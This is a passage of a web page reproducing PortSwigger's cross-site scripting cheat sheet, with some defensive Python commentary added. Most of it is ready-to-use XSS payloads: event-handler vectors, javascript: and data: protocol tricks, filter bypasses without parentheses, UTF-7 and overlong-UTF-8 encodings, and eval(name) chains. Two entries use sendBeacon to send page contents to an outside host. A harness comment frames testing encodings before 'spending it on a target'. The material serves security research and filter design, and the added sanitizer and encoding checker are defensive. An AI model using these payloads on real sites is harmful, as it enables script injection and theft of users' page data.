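  jsfuck:      "window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])",
};

// Runs every vector and returns, per family, the alert() arguments it produced.
function runAll() {
  const out = {};
  for (const [name, vector] of Object.entries(VECTORS)) out[name] = runVector(vector);
  return out;
}
```

runAll() returns example.test for the three families that read document.domain, XSS for the four that decode a literal (WFNT is base64 for XSS, and the octal and unicode escapes spell it out), and a for the JSFuck vector, whose argument (+{}+[])[+!![]] is the second character of "NaN". The same harness is a quick way to confirm a new encoding of a property name still resolves before spending it on a target.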

Classic vectors

Image src with JavaScript protocol
<img src="javascript:alert(1)">

Body background with JavaScript protocol
<body background="javascript:alert(1)">

Iframe data URLs no longer work, because modern browsers give them a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

Impossible labs

Each lab lists its title, description, length limit and the closest vector found so far.

Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.

Script-based injection, but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script-based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.

innerHTML context, but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals, then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.

Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``

Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert`` (followed by a trailing space)

Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q/oncut=eval(name)

Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute-based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see the lab link.

Injection occurs inside a frameset but before the body
We received a request via Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.

Injection occurs inside a single-quoted string; only the characters a-z0-9+` are allowed
The injection occurs within a single-quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.

VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt

JScript compact was a minimal version of JS thatwasnt widely used in IE

lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in NetscapeNavigator

lta title=ampalert(1)gtXSSltagt

JavaScript stylesheets used to be supported byNetscape Navigator

ltlink href=xssjs rel=stylesheet type=textjavascriptgt

Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme

IE9 select elements and plaintext used to consumemarkup

ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt

XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions (<= IE7)
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style="color&#x3d;red">test</div>

Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions
<script>function window.onload(){alert(1)}</script>
<script>function window::onload(){alert(1)}</script>
<script>function window.location(){}</script><body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body>
<body><script>function document.body.innerHTML(){x='<img src=1 onerror=alert(1)>'}</script></body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"></BODY></HTML>

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside openingcomments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>

Isindex using src attribute
<isindex type=image src="//evil?

Isindex using submit
<isindex type=submit style="width:100%;height:100%;" value=XSS formaction="//evil?

Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>

Isindex and action
<isindex type=submit action=javascript:alert(1)>

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


onfocusout
Fires when an element loses focus
<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>

onhashchange
Fires if the hash changes
<body onhashchange=alert(1)>

onload
Fires when the element is loaded
<body onload=alert(1)>

onloadeddata
Fires when the first frame is loaded
<audio onloadeddata=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onloadedmetadata
Fires when the metadata is loaded
<audio autoplay onloadedmetadata=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onloadend
Fires when the element finishes loading
<image src=validimage.png onloadend=alert(1)>

onloadstart
Fires when the element begins to load
<image src=validimage.png onloadstart=alert(1)>

onmessage
Fires when a message event is received from a postMessage call
<body onmessage=alert(1)>

onpageshow
Fires when the page is shown
<body onpageshow=alert(1)>

onplay
Fires when the resource is played
<audio autoplay onplay=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onplaying
Fires when the resource is playing
<audio autoplay onplaying=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onpopstate
Fires when the history changes
<body onpopstate=alert(1)>

onprogress
Fires when the video/audio begins downloading
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>

onreadystatechange
Fires when the ready state changes
<applet onreadystatechange=alert(1)></applet>

onrepeat
Fires when an SVG animation repeats
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />

onresize
Fires when the window is resized
<body onresize=alert(1)>

onscroll
Fires when the page scrolls
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

onstart
Fires when the marquee starts
<marquee onstart=alert(1)>XSS</marquee>

ontimeupdate
Fires when the timeline is changed
<audio controls autoplay ontimeupdate=alert(1)><source src=validaudio.wav type=audio/wav></audio>

ontoggle
Fires when the details tag is expanded
<details ontoggle=alert(1) open>test</details>

ontransitioncancel
Fires when a CSS transition cancels
<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>

ontransitionend
Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>

ontransitionrun
Fires when a CSS transition begins
<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>

ontransitionstart
Fires when a CSS transition starts
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>

onunhandledrejection
Fires when a promise isn't handled
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>

onunload
Fires when the page is unloaded
<body onunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>

onwaiting
Fires while waiting for data
<video autoplay controls onwaiting=alert(1)><source src=validvideo.mp4 type=video/mp4></video>

onwebkitanimationend
Fires when a CSS animation ends
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend=alert(1)></xss>

onwebkitanimationiteration
Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration=alert(1)></xss>

onwebkitanimationstart
Fires when a CSS animation starts
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart=alert(1)></xss>

onwebkittransitionend
Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>

Event handlers that do require user interaction

Event Description Code

onauxclick
Fires when right clicking or using the middle button of the mouse
<input onauxclick=alert(1)>

onbeforecopy
Requires you to copy a piece of text
<a onbeforecopy=alert(1) contenteditable>test</a>

onbeforecut
Requires you to cut a piece of text
<a onbeforecut=alert(1) contenteditable>test</a>

onbeforepaste
Requires you to paste a piece of text
<a onbeforepaste=alert(1) contenteditable>test</a>

onchange
Requires a change of value
<input onchange=alert(1) value=xss>

onclick
Requires a click on the element
<xss onclick=alert(1)>test</xss>

onclose
Fires when a dialog is closed
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>

oncontextmenu
Triggered when right clicking to show the context menu
<xss oncontextmenu=alert(1)>test</xss>

oncopy
Requires you to copy a piece of text
<xss oncopy=alert(1) value=XSS autofocus tabindex=1>test

oncut
Requires you to cut a piece of text
<xss oncut=alert(1) value=XSS autofocus tabindex=1>test

ondblclick
Triggered when double clicking the element
<xss ondblclick=alert(1) autofocus tabindex=1>test</xss>

ondrag
Triggered when dragging the element
<xss draggable=true ondrag=alert(1)>test</xss>

ondragend
Triggered when dragging of the element finishes
<xss draggable=true ondragend=alert(1)>test</xss>

ondragenter
Requires a mouse drag
<xss draggable=true ondragenter=alert(1)>test</xss>

ondragleave
Requires a mouse drag
<xss draggable=true ondragleave=alert(1)>test</xss>

ondragover
Triggered when dragging over an element
<div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>

ondragstart
Requires a mouse drag
<xss draggable=true ondragstart=alert(1)>test</xss>

ondrop
Triggered when dropping a draggable element
<div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>

onfullscreenchange
Fires when a video changes full screen status
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>

oninput
Requires a change of value
<input oninput=alert(1) value=xss>

oninvalid
Requires a form submission with an element that does not satisfy its constraints, such as a required attribute
<form><input oninvalid=alert(1) required><input type=submit>

onkeydown
Triggered when a key is pressed
<xss onkeydown=alert(1) contenteditable>test</xss>

onkeypress
Triggered when a key is pressed
<xss onkeypress=alert(1) contenteditable>test</xss>

onkeyup
Triggered when a key is released
<xss onkeyup=alert(1) contenteditable>test</xss>

onmousedown
Triggered when the mouse button is pressed
<xss onmousedown=alert(1)>test</xss>

onmouseenter
Triggered when the mouse is hovered over the element
<xss onmouseenter=alert(1)>test</xss>

onmouseleave
Triggered when the mouse is moved away from the element
<xss onmouseleave=alert(1)>test</xss>

onmousemove
Requires mouse movement
<xss onmousemove=alert(1)>test</xss>

onmouseout
Triggered when the mouse is moved away from the element
<xss onmouseout=alert(1)>test</xss>

onmouseover
Requires a hover over the element
<xss onmouseover=alert(1)>test</xss>

onmouseup
Triggered when the mouse button is released
<xss onmouseup=alert(1)>test</xss>

onmousewheel
Fires when the mouse wheel scrolls
<xss onmousewheel=alert(1)>requires scrolling

onmozfullscreenchange
Fires when a video changes full screen status
<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>

onpagehide
Fires when the page is changed
<body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>

onpaste
Requires you to paste a piece of text
<a onpaste=alert(1) contenteditable>test</a>

onpause
Requires clicking the element to pause
<audio autoplay controls onpause=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onpointerdown
Fires on mouse down
<xss onpointerdown=alert(1)>XSS</xss>

onpointerenter
Fires on mouse enter
<xss onpointerenter=alert(1)>XSS</xss>

onpointerleave
Fires on mouse leave
<xss onpointerleave=alert(1)>XSS</xss>

onpointermove
Fires on mouse move
<xss onpointermove=alert(1)>XSS</xss>

onpointerout
Fires on mouse out
<xss onpointerout=alert(1)>XSS</xss>

onpointerover
Fires on mouse over
<xss onpointerover=alert(1)>XSS</xss>

onpointerrawupdate
Fires when the pointer changes
<xss onpointerrawupdate=alert(1)>XSS</xss>

onpointerup
Fires on mouse up
<xss onpointerup=alert(1)>XSS</xss>

onreset
Requires a click
<form onreset=alert(1)><input type=reset>

onsearch
Fires when a form is submitted and the input has a type attribute of search
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>

onseeked
Requires clicking the element's timeline
<audio autoplay controls onseeked=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onseeking
Requires clicking the element's timeline
<audio autoplay controls onseeking=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onselect
Requires you to select text
<input onselect=alert(1) value=XSS autofocus>

onselectionchange
Fires when the text selection on the page changes
<body onselectionchange=alert(1)>select some text

onselectstart
Fires when beginning a text selection
<body onselectstart=alert(1)>select some text

onshow
Fires when a context menu is shown
<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>

onsubmit
Requires a form submission
<form onsubmit=alert(1)><input type=submit>

ontouchend
Fires when a touch ends (touch-screen mobile devices only)
<body ontouchend=alert(1)>

ontouchmove
Fires when a touch moves across the screen (touch-screen mobile devices only)
<body ontouchmove=alert(1)>

ontouchstart
Fires when the screen is touched (touch-screen mobile devices only)
<body ontouchstart=alert(1)>

onvolumechange
Requires volume adjustment
<audio autoplay controls onvolumechange=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onwheel
Fires when you use the mouse wheel
<body onwheel=alert(1)>
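The two handler tables show that an event handler can ride on almost any element, including unknown tags such as <xss>, and that the handler names keep growing (onpointerrawupdate, onwebkitanimationend). Stripping a list of known on* attributes is therefore the wrong fix; the defence that holds is an allowlist of tags and attributes, where a handler attribute is simply never listed. The following Python example is added here and is not PortSwigger's code. It uses only the standard library, and its allowlist (ALLOWED_TAGS, VOID_TAGS) is constructed for the example rather than taken from the page.

```python
import html
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set, Tuple

# Constructed allowlist for this example: tag -> attributes that survive.
# Handler attributes, formaction, srcdoc and friends are never listed, so they can never pass.
ALLOWED_TAGS: Dict[str, Set[str]] = {
    "p": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "ul": set(), "ol": set(), "li": set(), "br": set(),
    "a": {"href", "title"},
}
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Re-serialises an HTML fragment keeping only allowlisted tags and attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        # (tag, attribute) pairs that were removed; attribute is None when the whole tag went.
        self.dropped: List[Tuple[str, Optional[str]]] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))        # <xss>, <svg>, <details>, <audio>, ... vanish
            return
        kept = []
        for name, value in attrs:
            if name in ALLOWED_TAGS[tag]:
                kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
            else:
                self.dropped.append((tag, name))    # onclick, ontoggle, onfocus, tabindex, ...
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag: str) -> None:
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data: str) -> None:
        # Text is re-escaped, so a "<" recovered from an entity cannot become markup again.
        self.out.append(html.escape(data, quote=False))

    # Comments, doctype and processing instructions carry nothing the allowlist permits.
    def handle_comment(self, data: str) -> None:
        pass

    def handle_decl(self, decl: str) -> None:
        pass

    def handle_pi(self, data: str) -> None:
        pass


def sanitize_fragment(fragment: str) -> Tuple[str, List[Tuple[str, Optional[str]]]]:
    """Return (clean_html, dropped) for an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed samples modelled on the rows above.
    for sample in ('<xss onclick=alert(1)>test</xss>',
                   '<details ontoggle=alert(1) open>test</details>',
                   '<a href="/profile" onfocus=alert(1) tabindex=1>me</a>'):
        clean, dropped = sanitize_fragment(sample)
        print(repr(clean), dropped)
```

The `dropped` list is worth logging: a burst of removed on* attributes from one user is a cheap detection signal, and it tells you which vectors people are actually trying. Note that `href` values still need a separate URL scheme check (the Protocols and Encoding sections show why); this block only decides which attributes exist at all.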

Restricted characters

No parentheses using exception handling
<script>onerror=alert;throw 1</script>

No parentheses using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>

No parentheses using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>

No parentheses using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval without
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect
<script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect, no strings
<script>location=name</script>

No parentheses using template strings
<script>alert`1`</script>

No parentheses using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event
<xss class="carousel slide" data-ride="carousel" data-interval=100 ontransitionend="alert(1)"><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>

Protocols

Iframe src attribute JavaScript protocol
<iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">

A standard JavaScript protocol
<a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed inside the protocol
<a href="javas	cript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon
<a href="javascript	:alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src
<script src=data:text/javascript,alert(1)></script>

SVG script href attribute without closing script tag
<svg><script href=data:text/javascript,alert(1) />

SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah

Button and formaction
<form><button formaction=javascript:alert(1)>XSS

Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form
<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type=hidden accesskey=X onclick=alert(1)> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel=canonical accesskey=X onclick=alert(1) /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage
<a href=# download="filename.html">Test</a>

Disable referrer using referrerpolicy
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function
<a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via name attribute in an <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>

Set window.name via target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag (type submit)
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag (type image)
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referrer
<meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8
\xC0\xBCscript>alert(1)</script>
\xE0\x80\xBCscript>alert(1)</script>
\xF0\x80\x80\xBCscript>alert(1)</script>
\xF8\x80\x80\x80\xBCscript>alert(1)</script>
\xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>
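Both the overlong UTF-8 entries here and the UTF-7 entries under Special tags rely on the same failure: the filter looks at bytes in one encoding while the browser decodes them in another, so the "<" never appears to the filter. The check a defender wants is to reject bytes that are not strictly valid UTF-8 before any HTML handling, and to declare the charset explicitly so nothing can be reinterpreted as UTF-7. The Python example below is added here and is not PortSwigger's code; it validates bytes with a conforming decoder, emulates what a lenient decoder would make of the five overlong forms above, and shows what UTF-7 makes of the ASCII-only payload from the Special tags section. The sample byte strings are constructed from the entries on this page.

```python
from typing import List, Tuple

# Constructed samples: the five overlong encodings of "<" listed above, each followed by "script>".
OVERLONG_SAMPLES: List[bytes] = [
    b"\xc0\xbcscript>",
    b"\xe0\x80\xbcscript>",
    b"\xf0\x80\x80\xbcscript>",
    b"\xf8\x80\x80\x80\xbcscript>",
    b"\xfc\x80\x80\x80\x80\xbcscript>",
]

# (mask, lead-byte pattern, sequence length, smallest code point that legitimately needs it)
_FORMS = [
    (0xE0, 0xC0, 2, 0x80),
    (0xF0, 0xE0, 3, 0x800),
    (0xF8, 0xF0, 4, 0x10000),
    (0xFC, 0xF8, 5, 0x200000),    # 5- and 6-byte forms were removed from UTF-8 by RFC 3629
    (0xFE, 0xFC, 6, 0x4000000),
]


def is_strict_utf8(data: bytes) -> bool:
    """True if a conforming decoder (CPython's is one) accepts the bytes unchanged."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def find_overlong(data: bytes) -> List[Tuple[int, int, int]]:
    """Emulate a lenient decoder: (offset, length, code point) for every overlong sequence.

    A lenient decoder turns C0 BC into U+003C "<"; an ASCII-only filter never sees that "<".
    """
    hits: List[Tuple[int, int, int]] = []
    i = 0
    while i < len(data):
        lead = data[i]
        if lead < 0x80:                       # plain ASCII byte
            i += 1
            continue
        for mask, pattern, length, minimum in _FORMS:
            if lead & mask != pattern:
                continue
            tail = data[i + 1:i + length]
            if len(tail) == length - 1 and all(t & 0xC0 == 0x80 for t in tail):
                cp = lead & (0xFF >> (length + 1))   # payload bits of the lead byte
                for t in tail:
                    cp = (cp << 6) | (t & 0x3F)
                if cp < minimum:
                    hits.append((i, length, cp))
                i += length
                break
        else:
            i += 1                            # not a well-formed multibyte start: skip it
    return hits


def utf7_view(data: bytes) -> str:
    """What a browser that is told (or guesses) UTF-7 sees in bytes containing no "<" at all."""
    return data.decode("utf-7")


if __name__ == "__main__":
    for sample in OVERLONG_SAMPLES:
        print(sample, is_strict_utf8(sample), find_overlong(sample))
    print(utf7_view(b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"))
```

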